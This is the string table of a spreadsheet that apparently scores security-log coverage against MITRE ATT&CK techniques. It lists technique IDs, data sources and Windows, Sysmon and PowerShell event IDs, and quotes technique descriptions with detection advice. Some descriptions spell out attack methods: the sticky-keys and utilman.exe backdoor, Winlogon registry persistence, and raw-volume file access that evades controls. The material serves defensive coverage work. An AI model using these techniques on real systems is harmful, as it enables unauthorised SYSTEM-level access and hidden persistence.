    <t>Windows:Defender</t>
  </si>
  <si>
    <t>Action on Malware failed</t>
  </si>
  <si>
    <t>Persistence</t>
  </si>
  <si>
    <t>Scheduled task created</t>
  </si>
  <si>
    <t>Powershell</t>
  </si>
  <si>
    <t>Use of Powershell</t>
  </si>
  <si>
    <t>Windows:PowerShell</t>
  </si>
  <si>
    <t>New Process</t>
  </si>
  <si>
    <t>New process create, include image path, hash, parent process GUID, etc.</t>
  </si>
  <si>
    <t>New Process Create with Command Line Options</t>
  </si>
  <si>
    <t>File Time/Data Change</t>
  </si>
  <si>
    <t>Change of a file create or last modified date</t>
  </si>
  <si>
    <t>Remote Desktop</t>
  </si>
  <si>
    <t>Tracking use of RDP</t>
  </si>
  <si>
    <t>Windows:RDP</t>
  </si>
  <si>
    <t>Network Connection</t>
  </si>
  <si>
    <t>Network connection src &amp; dst, requesting process</t>
  </si>
  <si>
    <t>7045, 10000, 10001, 10100, 20001, 20002, 20003, 24576, 24577, 24579</t>
  </si>
  <si>
    <t>4724, 4738</t>
  </si>
  <si>
    <t>Data Source</t>
  </si>
  <si>
    <t>Weight</t>
  </si>
  <si>
    <t>Datasources</t>
  </si>
  <si>
    <t>Weights</t>
  </si>
  <si>
    <t>T1001</t>
  </si>
  <si>
    <t>T1002</t>
  </si>
  <si>
    <t>T1003</t>
  </si>
  <si>
    <t>T1004</t>
  </si>
  <si>
    <t>T1005</t>
  </si>
  <si>
    <t>T1006</t>
  </si>
  <si>
    <t>T1007</t>
  </si>
  <si>
    <t>49;51</t>
  </si>
  <si>
    <t>T1008</t>
  </si>
  <si>
    <t>T1009</t>
  </si>
  <si>
    <t>T1010</t>
  </si>
  <si>
    <t>T1011</t>
  </si>
  <si>
    <t>T1012</t>
  </si>
  <si>
    <t>T1013</t>
  </si>
  <si>
    <t>T1014</t>
  </si>
  <si>
    <t>T1015</t>
  </si>
  <si>
    <t>T1016</t>
  </si>
  <si>
    <t>T1017</t>
  </si>
  <si>
    <t>T1018</t>
  </si>
  <si>
    <t>T1019</t>
  </si>
  <si>
    <t>T1020</t>
  </si>
  <si>
    <t>T1021</t>
  </si>
  <si>
    <t>T1022</t>
  </si>
  <si>
    <t>T1023</t>
  </si>
  <si>
    <t>T1024</t>
  </si>
  <si>
    <t>T1025</t>
  </si>
  <si>
    <t>T1026</t>
  </si>
  <si>
    <t>T1027</t>
  </si>
  <si>
    <t>T1028</t>
  </si>
  <si>
    <t>T1029</t>
  </si>
  <si>
    <t>T1030</t>
  </si>
  <si>
    <t>T1031</t>
  </si>
  <si>
    <t>T1032</t>
  </si>
  <si>
    <t>T1033</t>
  </si>
  <si>
    <t>T1034</t>
  </si>
  <si>
    <t>T1035</t>
  </si>
  <si>
    <t>T1036</t>
  </si>
  <si>
    <t>T1037</t>
  </si>
  <si>
    <t>T1038</t>
  </si>
  <si>
    <t>T1039</t>
  </si>
  <si>
    <t>T1040</t>
  </si>
  <si>
    <t>T1041</t>
  </si>
  <si>
    <t>T1042</t>
  </si>
  <si>
    <t>T1043</t>
  </si>
  <si>
    <t>T1044</t>
  </si>
  <si>
    <t>T1045</t>
  </si>
  <si>
    <t>T1046</t>
  </si>
  <si>
    <t>T1047</t>
  </si>
  <si>
    <t>T1048</t>
  </si>
  <si>
    <t>T1049</t>
  </si>
  <si>
    <t>T1050</t>
  </si>
  <si>
    <t>T1051</t>
  </si>
  <si>
    <t>T1052</t>
  </si>
  <si>
    <t>T1053</t>
  </si>
  <si>
    <t>T1054</t>
  </si>
  <si>
    <t>T1055</t>
  </si>
  <si>
    <t>T1056</t>
  </si>
  <si>
    <t>T1057</t>
  </si>
  <si>
    <t>T1058</t>
  </si>
  <si>
    <t>T1059</t>
  </si>
  <si>
    <t>T1060</t>
  </si>
  <si>
    <t>T1061</t>
  </si>
  <si>
    <t>T1062</t>
  </si>
  <si>
    <t>T1063</t>
  </si>
  <si>
    <t>T1064</t>
  </si>
  <si>
    <t>T1065</t>
  </si>
  <si>
    <t>T1066</t>
  </si>
  <si>
    <t>T1067</t>
  </si>
  <si>
    <t>T1068</t>
  </si>
  <si>
    <t>T1069</t>
  </si>
  <si>
    <t>T1070</t>
  </si>
  <si>
    <t>T1071</t>
  </si>
  <si>
    <t>T1072</t>
  </si>
  <si>
    <t>T1073</t>
  </si>
  <si>
    <t>T1074</t>
  </si>
  <si>
    <t>T1075</t>
  </si>
  <si>
    <t>T1076</t>
  </si>
  <si>
    <t>T1077</t>
  </si>
  <si>
    <t>T1078</t>
  </si>
  <si>
    <t>T1079</t>
  </si>
  <si>
    <t>T1080</t>
  </si>
  <si>
    <t>T1081</t>
  </si>
  <si>
    <t>T1082</t>
  </si>
  <si>
    <t>T1083</t>
  </si>
  <si>
    <t>T1084</t>
  </si>
  <si>
    <t>T1085</t>
  </si>
  <si>
    <t>T1086</t>
  </si>
  <si>
    <t>T1087</t>
  </si>
  <si>
    <t>T1088</t>
  </si>
  <si>
    <t>T1089</t>
  </si>
  <si>
    <t>T1090</t>
  </si>
  <si>
    <t>T1091</t>
  </si>
  <si>
    <t>T1092</t>
  </si>
  <si>
    <t>T1093</t>
  </si>
  <si>
    <t>T1094</t>
  </si>
  <si>
    <t>T1095</t>
  </si>
  <si>
    <t>T1096</t>
  </si>
  <si>
    <t>T1097</t>
  </si>
  <si>
    <t>T1098</t>
  </si>
  <si>
    <t>T1099</t>
  </si>
  <si>
    <t>T1100</t>
  </si>
  <si>
    <t>T1101</t>
  </si>
  <si>
    <t>T1102</t>
  </si>
  <si>
    <t>T1103</t>
  </si>
  <si>
    <t>T1104</t>
  </si>
  <si>
    <t>T1105</t>
  </si>
  <si>
    <t>T1106</t>
  </si>
  <si>
    <t>T1107</t>
  </si>
  <si>
    <t>T1108</t>
  </si>
  <si>
    <t>T1109</t>
  </si>
  <si>
    <t>T1110</t>
  </si>
  <si>
    <t>T1111</t>
  </si>
  <si>
    <t>T1112</t>
  </si>
  <si>
    <t>T1113</t>
  </si>
  <si>
    <t>T1114</t>
  </si>
  <si>
    <t>T1115</t>
  </si>
  <si>
    <t>T1116</t>
  </si>
  <si>
    <t>T1117</t>
  </si>
  <si>
    <t>T1118</t>
  </si>
  <si>
    <t>T1119</t>
  </si>
  <si>
    <t>T1120</t>
  </si>
  <si>
    <t>T1121</t>
  </si>
  <si>
    <t>T1122</t>
  </si>
  <si>
    <t>T1123</t>
  </si>
  <si>
    <t>T1124</t>
  </si>
  <si>
    <t xml:space="preserve">T1125 </t>
  </si>
  <si>
    <t>T1126</t>
  </si>
  <si>
    <t>T1127</t>
  </si>
  <si>
    <t>T1128</t>
  </si>
  <si>
    <t>T1129</t>
  </si>
  <si>
    <t>T1130</t>
  </si>
  <si>
    <t>T1131</t>
  </si>
  <si>
    <t>T1132</t>
  </si>
  <si>
    <t>T1133</t>
  </si>
  <si>
    <t>T1134</t>
  </si>
  <si>
    <t>T1135</t>
  </si>
  <si>
    <t>T1136</t>
  </si>
  <si>
    <t>T1137</t>
  </si>
  <si>
    <t>T1138</t>
  </si>
  <si>
    <t>T1139</t>
  </si>
  <si>
    <t>T1140</t>
  </si>
  <si>
    <t>T1141</t>
  </si>
  <si>
    <t>T1142</t>
  </si>
  <si>
    <t>T1143</t>
  </si>
  <si>
    <t>T1144</t>
  </si>
  <si>
    <t>T1145</t>
  </si>
  <si>
    <t>T1146</t>
  </si>
  <si>
    <t>T1147</t>
  </si>
  <si>
    <t>T1148</t>
  </si>
  <si>
    <t>T1149</t>
  </si>
  <si>
    <t>T1150</t>
  </si>
  <si>
    <t>T1151</t>
  </si>
  <si>
    <t>T1152</t>
  </si>
  <si>
    <t>T1153</t>
  </si>
  <si>
    <t>T1154</t>
  </si>
  <si>
    <t>T1155</t>
  </si>
  <si>
    <t>T1156</t>
  </si>
  <si>
    <t>T1157</t>
  </si>
  <si>
    <t>T1158</t>
  </si>
  <si>
    <t>T1159</t>
  </si>
  <si>
    <t>T1160</t>
  </si>
  <si>
    <t>T1161</t>
  </si>
  <si>
    <t>T1162</t>
  </si>
  <si>
    <t>T1163</t>
  </si>
  <si>
    <t>T1164</t>
  </si>
  <si>
    <t>T1165</t>
  </si>
  <si>
    <t>T1166</t>
  </si>
  <si>
    <t>T1167</t>
  </si>
  <si>
    <t>T1168</t>
  </si>
  <si>
    <t>T1169</t>
  </si>
  <si>
    <t>T1170</t>
  </si>
  <si>
    <t>T1171</t>
  </si>
  <si>
    <t>T1172</t>
  </si>
  <si>
    <t>T1173</t>
  </si>
  <si>
    <t>T1174</t>
  </si>
  <si>
    <t>T1175</t>
  </si>
  <si>
    <t>T1176</t>
  </si>
  <si>
    <t>T1177</t>
  </si>
  <si>
    <t>T1178</t>
  </si>
  <si>
    <t>T1179</t>
  </si>
  <si>
    <t>T1180</t>
  </si>
  <si>
    <t>T1181</t>
  </si>
  <si>
    <t>T1182</t>
  </si>
  <si>
    <t>T1183</t>
  </si>
  <si>
    <t>T1184</t>
  </si>
  <si>
    <t>T1185</t>
  </si>
  <si>
    <t>T1186</t>
  </si>
  <si>
    <t>T1187</t>
  </si>
  <si>
    <t>T1188</t>
  </si>
  <si>
    <t>T1189</t>
  </si>
  <si>
    <t>T1190</t>
  </si>
  <si>
    <t>T1191</t>
  </si>
  <si>
    <t>T1192</t>
  </si>
  <si>
    <t>T1193</t>
  </si>
  <si>
    <t>T1194</t>
  </si>
  <si>
    <t>T1195</t>
  </si>
  <si>
    <t>T1196</t>
  </si>
  <si>
    <t>T1197</t>
  </si>
  <si>
    <t>T1198</t>
  </si>
  <si>
    <t>T1199</t>
  </si>
  <si>
    <t>T1200</t>
  </si>
  <si>
    <t>T1201</t>
  </si>
  <si>
    <t>T1202</t>
  </si>
  <si>
    <t>T1203</t>
  </si>
  <si>
    <t>T1204</t>
  </si>
  <si>
    <t>T1205</t>
  </si>
  <si>
    <t>T1206</t>
  </si>
  <si>
    <t>T1207</t>
  </si>
  <si>
    <t>T1208</t>
  </si>
  <si>
    <t>T1209</t>
  </si>
  <si>
    <t>T1210</t>
  </si>
  <si>
    <t>T1211</t>
  </si>
  <si>
    <t>T1212</t>
  </si>
  <si>
    <t>T1213</t>
  </si>
  <si>
    <t>T1214</t>
  </si>
  <si>
    <t>T1215</t>
  </si>
  <si>
    <t>T1216</t>
  </si>
  <si>
    <t>T1217</t>
  </si>
  <si>
    <t>T1218</t>
  </si>
  <si>
    <t>T1219</t>
  </si>
  <si>
    <t>T1220</t>
  </si>
  <si>
    <t>T1221</t>
  </si>
  <si>
    <t>T1222</t>
  </si>
  <si>
    <t>T1223</t>
  </si>
  <si>
    <t>Completeness</t>
  </si>
  <si>
    <t>number, min 0 max 5</t>
  </si>
  <si>
    <t>The amount of systems that have this event type available</t>
  </si>
  <si>
    <t>Timeliness</t>
  </si>
  <si>
    <t>Availability</t>
  </si>
  <si>
    <t>Not available =  0,   Local = 2  ,  Central = 5</t>
  </si>
  <si>
    <t>0 - 1</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">It should add up to 1 per </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>DataSource</t>
    </r>
  </si>
  <si>
    <t>https://raw.githubusercontent.com/mitre/cti/master/enterprise-attack/enterprise-attack.json</t>
  </si>
  <si>
    <t>DataSource</t>
  </si>
  <si>
    <t>Score</t>
  </si>
  <si>
    <t>Anti-virus</t>
  </si>
  <si>
    <t>TrendMicro</t>
  </si>
  <si>
    <t>Symantec</t>
  </si>
  <si>
    <t>Kaspersky</t>
  </si>
  <si>
    <t>Windows Defender:1116,1117</t>
  </si>
  <si>
    <t>API monitoring</t>
  </si>
  <si>
    <t>Authentication logs</t>
  </si>
  <si>
    <t>Windows:4624</t>
  </si>
  <si>
    <t>Windows:4625</t>
  </si>
  <si>
    <t>Windows:4769</t>
  </si>
  <si>
    <t>Binary file metadata</t>
  </si>
  <si>
    <t>BIOS</t>
  </si>
  <si>
    <t>Data loss prevention</t>
  </si>
  <si>
    <t>Windows:4657</t>
  </si>
  <si>
    <t>Digital Certificate Logs</t>
  </si>
  <si>
    <t>DLL monitoring</t>
  </si>
  <si>
    <t>Sysmon:7</t>
  </si>
  <si>
    <t>EFI</t>
  </si>
  <si>
    <t>Environment variable</t>
  </si>
  <si>
    <t>Email gateway</t>
  </si>
  <si>
    <t>File monitoring</t>
  </si>
  <si>
    <t>Windows:4663</t>
  </si>
  <si>
    <t>Sysmon:2</t>
  </si>
  <si>
    <t>Sysmon:11</t>
  </si>
  <si>
    <t>Sysmon:15</t>
  </si>
  <si>
    <t>Windows:5140,5145</t>
  </si>
  <si>
    <t>Host network interface</t>
  </si>
  <si>
    <t>Kernel drivers</t>
  </si>
  <si>
    <t>Sysmon:6</t>
  </si>
  <si>
    <t>Windows:5038,6281</t>
  </si>
  <si>
    <t>Loaded DLLs</t>
  </si>
  <si>
    <t>Malware reverse engineering</t>
  </si>
  <si>
    <t>Cuckoo sandbox</t>
  </si>
  <si>
    <t>PaloAlto:WildFire</t>
  </si>
  <si>
    <t>MBR</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>Network device logs</t>
  </si>
  <si>
    <t>PaloAlto:DeviceLog</t>
  </si>
  <si>
    <t>Network protocol analysis</t>
  </si>
  <si>
    <t>Bro logging</t>
  </si>
  <si>
    <t>PaloAlto:TrafficLog</t>
  </si>
  <si>
    <t>Packet capture</t>
  </si>
  <si>
    <t>Moloch</t>
  </si>
  <si>
    <t>PowerShell logs</t>
  </si>
  <si>
    <t>PowerShell:200-500</t>
  </si>
  <si>
    <t>PowerShell:4100-4104</t>
  </si>
  <si>
    <t>Process command-line parameters</t>
  </si>
  <si>
    <t>Windows:4688</t>
  </si>
  <si>
    <t>Sysmon:1</t>
  </si>
  <si>
    <t>Process monitoring</t>
  </si>
  <si>
    <t>Windows:4689</t>
  </si>
  <si>
    <t>Sysmon:5</t>
  </si>
  <si>
    <t>Sysmon:8</t>
  </si>
  <si>
    <t>Windows Scheduled Tasks:100-200</t>
  </si>
  <si>
    <t>Windows Whitelist:8000-8027</t>
  </si>
  <si>
    <t>Process use of network</t>
  </si>
  <si>
    <t>Windows:5156</t>
  </si>
  <si>
    <t>Sysmon:3</t>
  </si>
  <si>
    <t>Sysmon:17</t>
  </si>
  <si>
    <t>Sysmon:18</t>
  </si>
  <si>
    <t>Sensor health and status</t>
  </si>
  <si>
    <t>Sysmon:4</t>
  </si>
  <si>
    <t>Sysmon:16</t>
  </si>
  <si>
    <t>Windows:6005</t>
  </si>
  <si>
    <t>Windows Defender:1005,1006,1008,1010,2001,2003,2004,3002,5008</t>
  </si>
  <si>
    <t>Services</t>
  </si>
  <si>
    <t>Windows Firewall:2003</t>
  </si>
  <si>
    <t>Windows:7040</t>
  </si>
  <si>
    <t>Windows:7045</t>
  </si>
  <si>
    <t>SSL/TLS inspection</t>
  </si>
  <si>
    <t>System calls</t>
  </si>
  <si>
    <t>Third-party application logs</t>
  </si>
  <si>
    <t>User interface</t>
  </si>
  <si>
    <t>VBR</t>
  </si>
  <si>
    <t>Windows Error Reporting</t>
  </si>
  <si>
    <t>Windows:1000,1001</t>
  </si>
  <si>
    <t>Windows event logs</t>
  </si>
  <si>
    <t>Windows:4724, 4738,4728,4732</t>
  </si>
  <si>
    <t>Windows:1102</t>
  </si>
  <si>
    <t>Windows Registry</t>
  </si>
  <si>
    <t>Sysmon:12</t>
  </si>
  <si>
    <t>Sysmon:13</t>
  </si>
  <si>
    <t>Sysmon:14</t>
  </si>
  <si>
    <t>WMI Objects</t>
  </si>
  <si>
    <t>Windows WMI:5861</t>
  </si>
  <si>
    <t>Sysmon:19</t>
  </si>
  <si>
    <t>Sysmon:20</t>
  </si>
  <si>
    <t>Sysmon:21</t>
  </si>
  <si>
    <t>Name</t>
  </si>
  <si>
    <t>Platforms</t>
  </si>
  <si>
    <t>Detection</t>
  </si>
  <si>
    <t>Description</t>
  </si>
  <si>
    <t>Tactic</t>
  </si>
  <si>
    <t>Data Obfuscation</t>
  </si>
  <si>
    <t>Packet capture,Process use of network,Process monitoring,Network protocol analysis</t>
  </si>
  <si>
    <t>Linux,macOS,Windows</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</si>
  <si>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</si>
  <si>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commingling legitimate traffic with C2 communications traffic, or using a non-standard data encoding system, such as a modified Base64 encoding for the message body of an HTTP request.</t>
  </si>
  <si>
    <t>command-and-control</t>
  </si>
  <si>
    <t>Data Compressed</t>
  </si>
  <si>
    <t>Binary file metadata,File monitoring,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Linux,Windows,macOS</t>
  </si>
  <si>
    <t>Compression software and compressed files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known compression utilities. This may yield a significant amount of benign events, depending on how systems in the environment are typically used.
If the communications channel is unencrypted, compressed files can be detected in transit during exfiltration with a network intrusion detection or data loss prevention system analyzing file headers. (Citation: Wikipedia File Header Signatures)</t>
  </si>
  <si>
    <t>An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. The compression is done separately from the exfiltration channel and is performed using a custom program or algorithm, or a more common compression library or utility such as 7zip, RAR, ZIP, or zlib.</t>
  </si>
  <si>
    <t>exfiltration</t>
  </si>
  <si>
    <t>Credential Dumping</t>
  </si>
  <si>
    <t>API monitoring,Process monitoring,PowerShell logs,Process command-line parameters</t>
  </si>
  <si>
    <t>Windows,Linux,macOS</t>
  </si>
  <si>
    <t>credential-access</t>
  </si>
  <si>
    <t>Winlogon Helper DLL</t>
  </si>
  <si>
    <t>Windows Registry,File monitoring,Process monitoring</t>
  </si>
  <si>
    <t>Windows</t>
  </si>
  <si>
    <t>Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns)  New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious.
Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t>Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in &lt;code&gt;HKLM\Software\[Wow6432Node\]Microsoft\Windows NT\CurrentVersion\Winlogon\&lt;/code&gt; and &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\&lt;/code&gt; are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013) 
Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)
* Winlogon\Notify - points to notification package DLLs that handle Winlogon events
* Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on
* Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on
Adversaries may take advantage of these features to repeatedly execute malicious code and establish Persistence.</t>
  </si>
  <si>
    <t>persistence</t>
  </si>
  <si>
    <t>Data from Local System</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to collect files from a system.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[PowerShell](https://attack.mitre.org/techniques/T1086).</t>
  </si>
  <si>
    <t>collection</t>
  </si>
  <si>
    <t>File System Logical Offsets</t>
  </si>
  <si>
    <t>Monitor handle opens on drive volumes that are made by processes to determine when they may directly access logical drives. (Citation: Github PowerSploit Ninjacopy)
Monitor processes and command-line arguments for actions that could be taken to copy files from the logical drive and evade common file system protections. Since this technique may also be used through [PowerShell](https://attack.mitre.org/techniques/T1086), additional logging of PowerShell scripts is recommended.</t>
  </si>
  <si>
    <t>Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique bypasses Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)
Utilities, such as NinjaCopy, exist to perform these actions in PowerShell. (Citation: Github PowerSploit Ninjacopy)</t>
  </si>
  <si>
    <t>defense-evasion</t>
  </si>
  <si>
    <t>System Service Discovery</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters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</si>
  <si>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information related to services.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</si>
  <si>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discovery</t>
  </si>
  <si>
    <t>Fallback Channels</t>
  </si>
  <si>
    <t>Malware reverse engineering,Netflow/Enclave netflow,Packet capture,Process monitoring,Process use of network</t>
  </si>
  <si>
    <t>Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.</t>
  </si>
  <si>
    <t>Binary Padding</t>
  </si>
  <si>
    <t>Binary file metadata,File monitoring,Malware reverse engineering</t>
  </si>
  <si>
    <t>Depending on the method used to pad files, a file-based signature may be capable of detecting padding using a scanning or on-access based tool. 
When executed, the resulting process from padded files may also exhibit other behavior characteristics of being used to conduct an intrusion such as system and network information Discovery or Lateral Movement, which could be used as event indicators that point to the source file.</t>
  </si>
  <si>
    <t>Application Window Discovery</t>
  </si>
  <si>
    <t>API monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>macOS,Windows</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</si>
  <si>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</si>
  <si>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may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.
In Mac, this can be done natively with a small [AppleScript](https://attack.mitre.org/techniques/T1155) script.</t>
  </si>
  <si>
    <t>Exfiltration Over Other Network Medium</t>
  </si>
  <si>
    <t>User interface,Process monitoring</t>
  </si>
  <si>
    <t>Processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a mouse click or key press) but access the network without such may be malicious.
Monitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.</t>
  </si>
  <si>
    <t>Exfiltration could occur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could choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.</t>
  </si>
  <si>
    <t>Query Registry</t>
  </si>
  <si>
    <t>Windows Registry,Process monitoring,Process command-line parameters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</si>
  <si>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Interaction with the Windows Registry may come from the command line using utilities such as [Reg](https://attack.mitre.org/software/S0075) or through running malware that may interact with the Registry through an API. Command-line invocation of utilities used to query the Registry may be detected through process and command-line monitoring.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</si>
  <si>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Port Monitors</t>
  </si>
  <si>
    <t>File monitoring,API monitoring,DLL monitoring,Windows Registry,Process monitoring</t>
  </si>
  <si>
    <t>* Monitor process API calls to  (Citation: AddMonitor).
* Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal.
* New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious.
* Monitor Registry writes to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors&lt;/code&gt;.
* Run the Autoruns utility, which checks for this Registry key as a persistence mechanism (Citation: TechNet Autoruns)</t>
  </si>
  <si>
    <t>persistence,privilege-escalation</t>
  </si>
  <si>
    <t>Rootkit</t>
  </si>
  <si>
    <t>BIOS,MBR,System calls</t>
  </si>
  <si>
    <t>Some rootkit protections may be built into anti-virus or operating system software. There are dedicated rootkit detection tools that look for specific types of rootkit behavior. Monitor for the existence of unrecognized DLLs, devices, services, and changes to the MBR. (Citation: Wikipedia Rootkit)</t>
  </si>
  <si>
    <t>Rootkits are programs that hide the existence of malware by intercepting (i.e., [Hooking](https://attack.mitre.org/techniques/T1179)) and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a [Hypervisor](https://attack.mitre.org/techniques/T1062), Master Boot Record, or the [System Firmware](https://attack.mitre.org/techniques/T1019). (Citation: Wikipedia Rootkit)
Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)</t>
  </si>
  <si>
    <t>Accessibility Features</t>
  </si>
  <si>
    <t>Changes to accessibility utility binaries or binary paths that do not correlate with known software, patch cycles, etc., are suspicious. Command line invocation of tools capable of modifying the Registry for associated keys are also suspicious. Utility arguments and the binaries themselves should be monitored for changes. Monitor Registry keys within &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Windows contains accessibility features that may be launched with a key combination before a user has logged in (for example, when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
Two common accessibility programs are &lt;code&gt;C:\Windows\System32\sethc.exe&lt;/code&gt;, launched when the shift key is pressed five times and &lt;code&gt;C:\Windows\System32\utilman.exe&lt;/code&gt;, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)
Depending on the version of Windows, an adversary may take advantage of these features in different ways because of code integrity enhancements. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in &lt;code&gt;%systemdir%\&lt;/code&gt;, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced. Examples for both methods:
For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., &lt;code&gt;C:\Windows\System32\utilman.exe&lt;/code&gt;) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
For the debugger method on Windows Vista and later as well as Windows Server 2008 and later, for example, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for the accessibility program (e.g., "utilman.exe"). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with RDP will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)
* On-Screen Keyboard: &lt;code&gt;C:\Windows\System32\osk.exe&lt;/code&gt;
* Magnifier: &lt;code&gt;C:\Windows\System32\Magnify.exe&lt;/code&gt;
* Narrator: &lt;code&gt;C:\Windows\System32\Narrator.exe&lt;/code&gt;
* Display Switcher: &lt;code&gt;C:\Windows\System32\DisplaySwitch.exe&lt;/code&gt;
* App Switcher: &lt;code&gt;C:\Windows\System32\AtBroker.exe&lt;/code&gt;</t>
  </si>
  <si>
    <t>System Network Configuration Discovery</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</si>
  <si>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</si>
  <si>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Application Deployment Software</t>
  </si>
  <si>
    <t>File monitoring,Process use of network,Process monitoring</t>
  </si>
  <si>
    <t>Monitor application deployments from a secondary system. Perform application deployment at regular times so that irregular deployment activity stands out. Monitor process activity that does not correlate to known good software. Monitor account login activity on the deployment system.</t>
  </si>
  <si>
    <t>Adversaries may deploy malicious software to systems within a network using application deployment systems employed by enterprise administrators.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t>
  </si>
  <si>
    <t>lateral-movement</t>
  </si>
  <si>
    <t>Remote System Discovery</t>
  </si>
  <si>
    <t>Network protocol analysis,Process monitoring,Process use of network,Process command-line parameters</t>
  </si>
  <si>
    <t>System Firmware</t>
  </si>
  <si>
    <t>API monitoring,BIOS,EFI</t>
  </si>
  <si>
    <t>System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.
Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)</t>
  </si>
  <si>
    <t>The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)
System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.</t>
  </si>
  <si>
    <t>Automated Exfiltration</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process use of network</t>
  </si>
  <si>
    <t>Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.</t>
  </si>
  <si>
    <t>Data, such as sensitive documents, may be exfiltrated through the use of automated processing or [Scripting](https://attack.mitre.org/techniques/T1064) after being gathered during Collection. 
When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over Command and Control Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).</t>
  </si>
  <si>
    <t>Remote Services</t>
  </si>
  <si>
    <t>Correlate use of login activity related to remote services with unusual behavior or other malicious or suspicious activity. Adversaries will likely need to learn about an environment and the relationships between systems through Discovery techniques prior to attempting Lateral Movement.</t>
  </si>
  <si>
